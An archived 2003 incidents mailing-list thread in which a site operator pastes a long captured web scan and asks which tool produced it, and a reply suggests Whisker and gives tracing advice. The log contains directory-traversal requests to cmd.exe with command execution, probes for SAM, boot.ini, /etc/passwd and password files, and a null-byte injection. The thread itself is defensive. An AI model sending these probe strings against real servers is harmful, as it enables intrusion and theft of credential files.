NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Incidents> 2003-04

RE: Does anyone recognize the scanner that causes this pattern ?

From: Jerry Shenk (jshenkdecommunications.com)
Date: Mon Apr 07 2003 - 10:34:02 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Replying to you and the list....I can never seem to get postings on the list
anymore....not sure why.

That's quite a list of hits. Whisker would be one (among many) tools that
could generate a pattern like that. It doesn't look like a worm to me.
Seems like somebody has specifically targeted you...or is auditing a
neighboring web server and mis-typed an IP address;) It looks like a
scanning tool that's just looking for all kinds of vulnerabilities. Are
they all from the same source? Do you have any kind of anomaly-based IDS
like SHADOW that would be collecting all headers? If so, you could look for
the source IP address. If not, you could hook up something on the outside
and watch for that IP address.

-----Original Message-----
From: deanpackethunter.com [mailto:deanpackethunter.com]
Sent: Sunday, April 06, 2003 3:24 PM
To: incidentssecurityfocus.com
Subject: Does anyone recognize the scanner that causes this pattern ?

I recently logged a fairly extensive web scan and am trying to ID the tool
responsible. Has anyone seen this particular pattern before ? HEAD
/.html/............*/config.sys HTTP/1.0\x0a\x0a HEAD
/.html/............./config.sys HTTP/1.0\x0a\x0a HEAD
/.html/............/autoexec.bat HTTP/1.0\x0a\x0a HEAD
/.jsp/WEB-INF/classes/Env.java HTTP/1.0\x0a\x0a HEAD /.nsf/../winnt/win.ini
HTTP/1.0\x0a\x0a HEAD /../boot.ini HTTP/1.0\x0a\x0a HEAD /../config.sys
HTTP/1.0\x0a\x0a HEAD /a.asp/..../..../winnt/repair/sam HTTP/1.0\x0a\x0a
HEAD /a.jsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0\x0a\x0a HEAD /cgi
HTTP/1.0\x0a\x0a HEAD /cgi/ HTTP/1.0\x0a\x0a HEAD /cgibin HTTP/1.0\x0a\x0a
HEAD /cgi-bin HTTP/1.0\x0a\x0a HEAD /cgibin/ HTTP/1.0\x0a\x0a HEAD /cgi-bin/
HTTP/1.0\x0a\x0a HEAD /cgi-bin/../../../../winnt/system32/cmd.exe
HTTP/1.0\x0a\x0a HEAD /cgi-bin/......../winnt/system32/cmd.exe
HTTP/1.0\x0a\x0a HEAD /cgi-bin/............winntsystem32cmd.exe?/c+dir+c:
HTTP/1.0\x0a\x0a HEAD /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\x0a\x0a HEAD /cgi-bin/sam._ HTTP/1.0\x0a\x0a HEAD /cgi-win
HTTP/1.0\x0a\x0a HEAD /cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD /doc
HTTP/1.0\x0a\x0a HEAD /iisadmin HTTP/1.0\x0a\x0a HEAD /iisadmin/
HTTP/1.0\x0a\x0a HEAD /iisamples/Sdk HTTP/1.0\x0a\x0a HEAD /iissamples
HTTP/1.0\x0a\x0a HEAD /iissamples/Default HTTP/1.0\x0a\x0a HEAD
/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /scripts
HTTP/1.0\x0a\x0a HEAD /scripts/ HTTP/1.0\x0a\x0a HEAD /scripts/*
HTTP/1.0\x0a\x0a HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 \x0a\x0a HEAD
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /scripts/../../cmd.exe HTTP/1.0\x0a\x0a HEAD
/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/scripts/..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD
/scripts/........../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/scripts/........../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/scripts/cmd.exe HTTP/1.0\x0a\x0a HEAD /scripts/cmd.exe?/c+dir%20c:
HTTP/1.0\x0a\x0a HEAD /scripts/iisadmin/default.htm HTTP/1.0\x0a\x0a HEAD
/scripts/iisadmin/samples HTTP/1.0\x0a\x0a HEAD /scripts/iisadmin/tools
HTTP/1.0\x0a\x0a HEAD /scripts/perl HTTP/1.0\x0a\x0a HEAD /scripts/samples
HTTP/1.0\x0a\x0a HEAD /scripts/tools HTTP/1.0\x0a\x0a HEAD /search
HTTP/1.0\x0a\x0a HEAD /server-info HTTP/1.0\x0a\x0a HEAD /server-status
HTTP/1.0\x0a\x0a HEAD /_AuthChangeUrl HTTP/1.0\x0a\x0a HEAD /_AuthChangeUrl?
HTTP/1.0\x0a\x0a HEAD /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\x0a\x0a HEAD
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /_mem_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/_mem_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD
/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/_private HTTP/1.0\x0a\x0a HEAD /_vti_bin/_vti_adm HTTP/1.0\x0a\x0a HEAD
/_vti_bin/_vti_aut HTTP/1.0\x0a\x0a HEAD /_vti_bin HTTP/1.0\x0a\x0a HEAD
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /_vti_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/_vti_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD
/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/cgi-bin/_vti_cnf HTTP/1.0\x0a\x0a HEAD /_vti_inf.html HTTP/1.0\x0a\x0a HEAD
/_vti_log HTTP/1.0\x0a\x0a HEAD /_vti_pvt HTTP/1.0\x0a\x0a HEAD /_vti_pvt/
HTTP/1.0\x0a\x0a HEAD /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0\x0a\x0a HEAD
/_vti_txt HTTP/1.0\x0a\x0a HEAD /abczxv.htw HTTP/1.0\x0a\x0a HEAD
/msadc/samples/adctest.asp HTTP/1.0\x0a\x0a HEAD /scripts/Carello/add.exe
HTTP/1.0\x0a\x0a HEAD /cfdocs/exampleapp/publish/admin/addcontent.cfm
HTTP/1.0\x0a\x0a HEAD /_vti_adm/admin.dll HTTP/1.0\x0a\x0a HEAD
/scripts/admin.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD
/_vti_pvt/administrator.pwd HTTP/1.0\x0a\x0a HEAD
/_vti_pvt/administrators.pwd HTTP/1.0\x0a\x0a HEAD /session/adminlogin
HTTP/1.0\x0a\x0a HEAD /admisapi/ HTTP/1.0\x0a\x0a HEAD
/iissamples/exair/search/advsearch.asp HTTP/1.0\x0a\x0a HEAD
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%
2Fetc&dispsize=640&start=0 HTTP/1.0\x0a\x0a HEAD /cgi-bin/alibaba.pl
HTTP/1.0\x0a\x0a HEAD /app.cfm HTTP/1.0\x0a\x0a HEAD /cgi-dos/args.bat
HTTP/1.0\x0a\x0a HEAD /cgi-dos/args.cmd HTTP/1.0\x0a\x0a HEAD
/_vti_bin/_vti_aut/author.dll HTTP/1.0\x0a\x0a HEAD /_vti_pvt/author.log
HTTP/1.0\x0a\x0a HEAD /_vti_pvt/authors.pwd HTTP/1.0\x0a\x0a HEAD
/autoexec.bat HTTP/1.0\x0a\x0a HEAD /cgi-bin/bb-hostsvc.sh HTTP/1.0\x0a\x0a
HEAD /scripts/bbs.pl%3F+.htr HTTP/1.0\x0a\x0a HEAD /bdir.htr
HTTP/1.0\x0a\x0a HEAD /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\x0a\x0a
HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0
\x0a\x0a HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:
HTTP/1.0 \x0a\x0a HEAD /bin/scripts/......../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\x0a\x0a HEAD
/bin/scripts/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/common/browser.inc HTTP/1.0\x0a\x0a HEAD /scripts/c32web.exe
HTTP/1.0\x0a\x0a HEAD /carbo.dll HTTP/1.0\x0a\x0a HEAD
/scripts/Carello/Carello.dll HTTP/1.0\x0a\x0a HEAD /scripts/cart32.exe
HTTP/1.0\x0a\x0a HEAD /scripts/cart32.exe/cart32clientlist HTTP/1.0\x0a\x0a
HEAD /catalog.nsf HTTP/1.0\x0a\x0a HEAD /catalog.nsf/ HTTP/1.0\x0a\x0a HEAD
/AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a HEAD
/ASPSamp/AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a HEAD
/WebShop/logs/cc.txt HTTP/1.0\x0a\x0a HEAD /WebShop/templates/cc.txt
HTTP/1.0\x0a\x0a HEAD /cgi-bin/ceilidh.exe HTTP/1.0\x0a\x0a HEAD
/cfcache.map HTTP/1.0\x0a\x0a HEAD /cfdocs/cfmlsyntaxcheck.cfm
HTTP/1.0\x0a\x0a HEAD /cfusion/database/cfsnippets.mdb HTTP/1.0\x0a\x0a HEAD
/scripts/cgimail.exe HTTP/1.0\x0a\x0a HEAD /scripts/CGImail.exe
HTTP/1.0\x0a\x0a HEAD /cgi-bin/cgitest.exe HTTP/1.0\x0a\x0a HEAD
/scripts/c32web.exe/ChangeAdminPassword HTTP/1.0\x0a\x0a HEAD
/cgi-bin/changepw.exe HTTP/1.0\x0a\x0a HEAD
/cgi-bin/c32web.exe/CheckError?error=53 HTTP/1.0\x0a\x0a HEAD
/config/checks.txt HTTP/1.0\x0a\x0a HEAD /WebShop/logs/ck.log
HTTP/1.0\x0a\x0a HEAD /msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:
HTTP/1.0 \x0a\x0a HEAD /msadc/..../..../..../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\x0a\x0a HEAD
/msadc/..../..../..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /msadc/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/msadc/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD
/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/msadc/msadcs.dll HTTP/1.0\x0a\x0a HEAD /scripts/tools/newdsn.exe
HTTP/1.0\x0a\x0a HEAD /nofile.pl HTTP/1.0\x0a\x0a HEAD
/_vti_bin/shtml.dll/nosuch.htm HTTP/1.0\x0a\x0a HEAD
/scripts/no-such-file.pl HTTP/1.0\x0a\x0a HEAD /cfdocs/expelval/openfile.cfm
HTTP/1.0\x0a\x0a HEAD /cfdocs/expeval/openfile.cfm HTTP/1.0\x0a\x0a HEAD
/Admin_files/order.log HTTP/1.0\x0a\x0a HEAD /_private/orders.txt
HTTP/1.0\x0a\x0a HEAD /config/orders.txt HTTP/1.0\x0a\x0a HEAD
/wwwboard/passwd.txt HTTP/1.0\x0a\x0a HEAD /pbserver/ HTTP/1.0\x0a\x0a HEAD
/pbserver/pbserver.dll HTTP/1.0\x0a\x0a HEAD /cgi-bin/perl.exe
HTTP/1.0\x0a\x0a HEAD /cgi-bin/scripts/perl.exe HTTP/1.0\x0a\x0a HEAD
/cgi-win/perl.exe HTTP/1.0\x0a\x0a HEAD /ows-bin/perlidlc.bat?&dir
HTTP/1.0\x0a\x0a HEAD /scripts/pfieffer.bat HTTP/1.0\x0a\x0a HEAD
/scripts/pfieffer.cmd HTTP/1.0\x0a\x0a HEAD /cgi-bin/post32.exe
HTTP/1.0\x0a\x0a HEAD /scripts/postinfo.asp HTTP/1.0\x0a\x0a HEAD
/cgi-bin/ppdscgi.exe HTTP/1.0\x0a\x0a HEAD /private HTTP/1.0\x0a\x0a HEAD
/process_bug.cgi HTTP/1.0\x0a\x0a HEAD /iissamples/iissamples/query.asp
HTTP/1.0\x0a\x0a HEAD /iissamples/issamples/query.asp HTTP/1.0\x0a\x0a HEAD
/samples/search/queryhit.htm HTTP/1.0\x0a\x0a HEAD
/cfusion/cfapps/security/data/realm.mdb HTTP/1.0\x0a\x0a HEAD
/cfusion/cfapps/security/realm_.mdb HTTP/1.0\x0a\x0a HEAD
/scripts/emurl/RECMAN.dll HTTP/1.0\x0a\x0a HEAD /cgi-bin/redirect.exe
HTTP/1.0\x0a\x0a HEAD /_private/register.txt HTTP/1.0\x0a\x0a HEAD
/_private/registrations.txt HTTP/1.0\x0a\x0a HEAD /scripts/repost.asp
HTTP/1.0\x0a\x0a HEAD /bin/scripts/openvendor/gnete/RetrievePNBody.asp
HTTP/1.0\x0a\x0a HEAD /cgi-bin/rguest.exe HTTP/1.0\x0a\x0a HEAD
/scripts/rguest.exe HTTP/1.0\x0a\x0a HEAD /robots.txt HTTP/1.0\x0a\x0a HEAD
/cfdocs/root.cfm HTTP/1.0\x0a\x0a HEAD /scripts/root.exe?/c+dir%20c:
HTTP/1.0\x0a\x0a HEAD /sample.asp HTTP/1.0\x0a\x0a HEAD
/IISSAMPLES/ExAir/Search/search.asp HTTP/1.0\x0a\x0a HEAD /search.dll
HTTP/1.0\x0a\x0a HEAD /cgi-bin/search97.vts HTTP/1.0\x0a\x0a HEAD
/search97.vts HTTP/1.0\x0a\x0a HEAD /cfdocs/expeval/sendmail.cfm
HTTP/1.0\x0a\x0a HEAD /_vti_pvt/service.grp HTTP/1.0\x0a\x0a HEAD
/cfdocs/expelval/sendmail.cfm HTTP/1.0\x0a\x0a HEAD /_vti_pvt/service.pwd
HTTP/1.0\x0a\x0a HEAD /servlet/SessionServlet HTTP/1.0\x0a\x0a HEAD
/cgi-bin/shop.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/shopper.cgi
HTTP/1.0\x0a\x0a HEAD /_private/shopping_cart.mdb HTTP/1.0\x0a\x0a HEAD
/cgi-bin/c32web.exe/ShowAdminDir HTTP/1.0\x0a\x0a HEAD
/iissamples/exair/howitworks/showcode.asp HTTP/1.0\x0a\x0a HEAD
/msadc/samples/selector/showcode.asp HTTP/1.0\x0a\x0a HEAD
/msadc/samples/selector/showcode.asp_2 HTTP/1.0\x0a\x0a HEAD /showfile.asp
HTTP/1.0\x0a\x0a HEAD /_vti_bin/shtml.dll HTTP/1.0\x0a\x0a HEAD
/_vti_pvt/shtml.dll HTTP/1.0\x0a\x0a HEAD /_vti_bin/shtml.exe
HTTP/1.0\x0a\x0a HEAD /_vti_pvt/shtml.exe HTTP/1.0\x0a\x0a HEAD
/ex/jsp/simple.jsp. HTTP/1.0\x0a\x0a HEAD /adsamples/config/site.csc
HTTP/1.0\x0a\x0a HEAD /scripts/slxweb.dll HTTP/1.0\x0a\x0a HEAD /smdata.dat
HTTP/1.0\x0a\x0a HEAD /cfusion/database/smpolicy.mdb HTTP/1.0\x0a\x0a HEAD
/cgi-bin/snorkerz.bat HTTP/1.0\x0a\x0a HEAD /cgi-bin/snorkerz.cmd
HTTP/1.0\x0a\x0a HEAD /cfdocs/exampleapp/docs/sourcewindow.cfm
HTTP/1.0\x0a\x0a HEAD /srchadm HTTP/1.0\x0a\x0a HEAD /cgi-bin/statsconfig.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/test.bat HTTP/1.0\x0a\x0a HEAD
/cgi-bin/test.cgi HTTP/1.0\x0a\x0a HEAD /today.nsf HTTP/1.0\x0a\x0a HEAD
/tree.dat HTTP/1.0\x0a\x0a HEAD /cgi-bin/tst.bat HTTP/1.0\x0a\x0a HEAD
/admin/ HTTP/1.0\x0a\x0a HEAD /administrator/ HTTP/1.0\x0a\x0a HEAD /bbs/
HTTP/1.0\x0a\x0a HEAD /bbs/admin/ HTTP/1.0\x0a\x0a HEAD /bbs/admin/config/
HTTP/1.0\x0a\x0a HEAD /bbs/data/ HTTP/1.0\x0a\x0a HEAD /bbs/db/
HTTP/1.0\x0a\x0a HEAD /bbs/include/ HTTP/1.0\x0a\x0a HEAD /cache-stats/
HTTP/1.0\x0a\x0a HEAD /card/ HTTP/1.0\x0a\x0a HEAD /cgi-bin/admin/admin
HTTP/1.0\x0a\x0a HEAD /cgi-bin/Board/db/ HTTP/1.0\x0a\x0a HEAD
/cgi-bin/campas HTTP/1.0\x0a\x0a HEAD /cgi-bin/counterfiglet/nc/f
HTTP/1.0\x0a\x0a HEAD /cgi-bin/jj HTTP/1.0\x0a\x0a HEAD /cgi-bin/perl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/query HTTP/1.0\x0a\x0a HEAD /cgi-bin/ssi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/wrap HTTP/1.0\x0a\x0a HEAD /config/
HTTP/1.0\x0a\x0a HEAD /customer/ HTTP/1.0\x0a\x0a HEAD /data/
HTTP/1.0\x0a\x0a HEAD /database/ HTTP/1.0\x0a\x0a HEAD /databases/
HTTP/1.0\x0a\x0a HEAD /db/ HTTP/1.0\x0a\x0a HEAD /dbase/ HTTP/1.0\x0a\x0a
HEAD /deny/ HTTP/1.0\x0a\x0a HEAD /devel/ HTTP/1.0\x0a\x0a HEAD /docs/
HTTP/1.0\x0a\x0a HEAD /document/ HTTP/1.0\x0a\x0a HEAD /documents/
HTTP/1.0\x0a\x0a HEAD /down/ HTTP/1.0\x0a\x0a HEAD /download/
HTTP/1.0\x0a\x0a HEAD /downloads/ HTTP/1.0\x0a\x0a HEAD /example/
HTTP/1.0\x0a\x0a HEAD /exec/show/config/cr HTTP/1.0\x0a\x0a HEAD /file/
HTTP/1.0\x0a\x0a HEAD /files/ HTTP/1.0\x0a\x0a HEAD /forum/ HTTP/1.0\x0a\x0a
HEAD /ftp/ HTTP/1.0\x0a\x0a HEAD /girl/ HTTP/1.0\x0a\x0a HEAD /girls/
HTTP/1.0\x0a\x0a HEAD /hire/ HTTP/1.0\x0a\x0a HEAD /htdocs/ HTTP/1.0\x0a\x0a
HEAD /idea/ HTTP/1.0\x0a\x0a HEAD /ideas/ HTTP/1.0\x0a\x0a HEAD /image/
HTTP/1.0\x0a\x0a HEAD /images/ HTTP/1.0\x0a\x0a HEAD /img/ HTTP/1.0\x0a\x0a
HEAD /inc/ HTTP/1.0\x0a\x0a HEAD /include/ HTTP/1.0\x0a\x0a HEAD
/include/inc/ HTTP/1.0\x0a\x0a HEAD /includes/ HTTP/1.0\x0a\x0a HEAD
/incoming/ HTTP/1.0\x0a\x0a HEAD /install/ HTTP/1.0\x0a\x0a HEAD /lib/
HTTP/1.0\x0a\x0a HEAD /library/ HTTP/1.0\x0a\x0a HEAD /linux/
HTTP/1.0\x0a\x0a HEAD /logging/ HTTP/1.0\x0a\x0a HEAD /manual/
HTTP/1.0\x0a\x0a HEAD /misc/ HTTP/1.0\x0a\x0a HEAD /mp3/ HTTP/1.0\x0a\x0a
HEAD /mrtg/ HTTP/1.0\x0a\x0a HEAD /msql/ HTTP/1.0\x0a\x0a HEAD /mysql/
HTTP/1.0\x0a\x0a HEAD /number/ HTTP/1.0\x0a\x0a HEAD /pds/ HTTP/1.0\x0a\x0a
HEAD /perl HTTP/1.0\x0a\x0a HEAD /phone/ HTTP/1.0\x0a\x0a HEAD /php/
HTTP/1.0\x0a\x0a HEAD /php3/ HTTP/1.0\x0a\x0a HEAD /php4/ HTTP/1.0\x0a\x0a
HEAD /porno/ HTTP/1.0\x0a\x0a HEAD /ports/ HTTP/1.0\x0a\x0a HEAD /private/
HTTP/1.0\x0a\x0a HEAD /program/ HTTP/1.0\x0a\x0a HEAD /programming/
HTTP/1.0\x0a\x0a HEAD /programs/ HTTP/1.0\x0a\x0a HEAD /public/
HTTP/1.0\x0a\x0a HEAD /secret/ HTTP/1.0\x0a\x0a HEAD /secrets/
HTTP/1.0\x0a\x0a HEAD /server_stats/ HTTP/1.0\x0a\x0a HEAD /server-info/
HTTP/1.0\x0a\x0a HEAD /server-status/ HTTP/1.0\x0a\x0a HEAD /set/
HTTP/1.0\x0a\x0a HEAD /setting/ HTTP/1.0\x0a\x0a HEAD /setup/
HTTP/1.0\x0a\x0a HEAD /sex/ HTTP/1.0\x0a\x0a HEAD /snmp/ HTTP/1.0\x0a\x0a
HEAD /source/ HTTP/1.0\x0a\x0a HEAD /sources/ HTTP/1.0\x0a\x0a HEAD /sql/
HTTP/1.0\x0a\x0a HEAD /stat/ HTTP/1.0\x0a\x0a HEAD /statistics/
HTTP/1.0\x0a\x0a HEAD /Stats/ HTTP/1.0\x0a\x0a HEAD /stats/ HTTP/1.0\x0a\x0a
HEAD /telephone/ HTTP/1.0\x0a\x0a HEAD /temp/ HTTP/1.0\x0a\x0a HEAD
/temporary/ HTTP/1.0\x0a\x0a HEAD /test/ HTTP/1.0\x0a\x0a HEAD /tool/
HTTP/1.0\x0a\x0a HEAD /tools/ HTTP/1.0\x0a\x0a HEAD /usage/ HTTP/1.0\x0a\x0a
HEAD /weblog/ HTTP/1.0\x0a\x0a HEAD /weblogs/ HTTP/1.0\x0a\x0a HEAD
/webstats/ HTTP/1.0\x0a\x0a HEAD /work/ HTTP/1.0\x0a\x0a HEAD /wstats/
HTTP/1.0\x0a\x0a HEAD /wwwlog/ HTTP/1.0\x0a\x0a HEAD /wwwstats/
HTTP/1.0\x0a\x0a HEAD /acid/ HTTP/1.0\x0a\x0a HEAD /acid/acid_main.php
HTTP/1.0\x0a\x0a HEAD /cgi-bin/ad.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/adcycle
HTTP/1.0\x0a\x0a HEAD /secret/secret/add-user.shmtl HTTP/1.0\x0a\x0a HEAD
/admin.php3?admin=anything HTTP/1.0\x0a\x0a HEAD /adpassword.txt
HTTP/1.0\x0a\x0a HEAD /cgi-bin/aglimpse HTTP/1.0\x0a\x0a HEAD
/cgi-bin/allmanage.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/allmanageup.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/amlite/amadmin.pl HTTP/1.0\x0a\x0a HEAD
/cgi-bin/anacondaclip.pl?template=check HTTP/1.0\x0a\x0a HEAD
/cgi-bin/AnyForm2 HTTP/1.0\x0a\x0a HEAD /cgi-bin/AT-admin.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/AT-generate.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/awl/auctionweaver.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/auktion.pl
HTTP/1.0\x0a\x0a HEAD /banners.php?op=Change HTTP/1.0\x0a\x0a HEAD
/cgi-bin/bb-hist.sh HTTP/1.0\x0a\x0a HEAD /cgi-bin/bbs_forum.cgi
HTTP/1.0\x0a\x0a HEAD /examples/applications/bboard/bboard_frames.html
HTTP/1.0\x0a\x0a HEAD /cgi-bin/bizdb1-search.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/bnbform.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/build.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/cached_feed.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/cachemgr.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/cal_make.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/calender.pl HTTP/1.0\x0a\x0a HEAD
/cgi-bin/calender_admin.pl HTTP/1.0\x0a\x0a HEAD
/cgi-bin/s.cgi?q=a&tmpl=check HTTP/1.0\x0a\x0a HEAD /cgi-bin-sdb
HTTP/1.0\x0a\x0a HEAD /cgi-bin/cgiforum.pl HTTP/1.0\x0a\x0a HEAD
/manage/cgi/cgiproc HTTP/1.0\x0a\x0a HEAD /cgi-bin/cgiwrap HTTP/1.0\x0a\x0a
HEAD /secret/secret/change-passwd.shtml HTTP/1.0\x0a\x0a HEAD
/cgi-bin/changepw.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/classifieds.cgi
HTTP/1.0\x0a\x0a HEAD
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
HTTP/1.0\x0a\x0a HEAD
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server HTTP/1.0
\x0a\x0a HEAD /caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
HTTP/1.0 \x0a\x0a HEAD
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC HTTP/1.0 \x0a\x0a
HEAD /caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 HTTP/1.0
\x0a\x0a HEAD /servlet/com.livesoftware.jrun.plugins.jsp.JSP
HTTP/1.0\x0a\x0a HEAD /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
HTTP/1.0\x0a\x0a HEAD /servlet/com.unify.ewave.servletexec.UploadServlet
HTTP/1.0\x0a\x0a HEAD /cgi-bin/commerce.cgi?page=check HTTP/1.0\x0a\x0a HEAD
/forum/common.php HTTP/1.0\x0a\x0a HEAD /phorum/common.php HTTP/1.0\x0a\x0a
HEAD /cgi-bin/Count.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/CrazyWWWBoard.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/csvform.pl HTTP/1.0\x0a\x0a HEAD
/cgi-bin/htgrep HTTP/1.0\x0a\x0a HEAD /cgi-bin/htmlscript HTTP/1.0\x0a\x0a
HEAD /cgi-bin/htsearch HTTP/1.0\x0a\x0a HEAD /cgi-bin/htsearch?config=aaa
HTTP/1.0\x0a\x0a HEAD /index.html.bak HTTP/1.0\x0a\x0a HEAD /index.html~
HTTP/1.0\x0a\x0a HEAD /index.js%2570 HTTP/1.0\x0a\x0a HEAD /index.php.bak
HTTP/1.0\x0a\x0a HEAD /index.php~ HTTP/1.0\x0a\x0a HEAD
/index.php3?vhosts[test]= HTTP/1.0\x0a\x0a HEAD
/adminlogin?RCpage=/sysadmin/index.stm HTTP/1.0\x0a\x0a HEAD
/cgi-bin/info2www HTTP/1.0\x0a\x0a HEAD /cgi-bin/infosrch.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/lasso.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/loadpage.cgi
HTTP/1.0\x0a\x0a HEAD /ConsoleHelp/login.jsp HTTP/1.0\x0a\x0a HEAD
/login.jsp HTTP/1.0\x0a\x0a HEAD /cgi-bin/mailfile.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/mailform.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/maillist.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/mailnews.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/mailto.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/man.sh HTTP/1.0\x0a\x0a
HEAD /manual.php HTTP/1.0\x0a\x0a HEAD /cgi-bin/mdma.bat HTTP/1.0\x0a\x0a
HEAD /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES= HTTP/1.0\x0a\x0a HEAD
/class/mysql.class HTTP/1.0\x0a\x0a HEAD /names.nsf HTTP/1.0\x0a\x0a HEAD
/ncl_items.html?SUBJECT=2097 HTTP/1.0\x0a\x0a HEAD /cgi-bin/netauth.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/news/news.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/nph-maillist.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/nph-publish
HTTP/1.0\x0a\x0a HEAD /cgi-bin/nph-test-cgi HTTP/1.0\x0a\x0a HEAD
/examples/jsp/num/numguess.js%70 HTTP/1.0\x0a\x0a HEAD /cgi-bin/pagelog.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/pals-cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/newsdesk.cgi?t=../pass.txt HTTP/1.0\x0a\x0a HEAD
/opendir.php?requesturl=/etc/passwd HTTP/1.0\x0a\x0a HEAD
/piranha/secure/passwd.php3 HTTP/1.0\x0a\x0a HEAD /cgi-bin/perlshop.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/phf HTTP/1.0\x0a\x0a HEAD /cgi-bin/phf.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/php HTTP/1.0\x0a\x0a HEAD /cgi-bin/php.cgi HTTP/1.0\x0a\x0a HEAD
/phpgroupware/inc/phpgwapi/phpgw.inc.php HTTP/1.0\x0a\x0a HEAD
/cgi-bin/plusmail HTTP/1.0\x0a\x0a HEAD
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00 HTTP/1.0 \x0a\x0a
HEAD /cgi-bin/postings.cgi?
action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
HTTP/1.0\x0a\x0a HEAD /cgi-bin/post-query HTTP/1.0\x0a\x0a HEAD
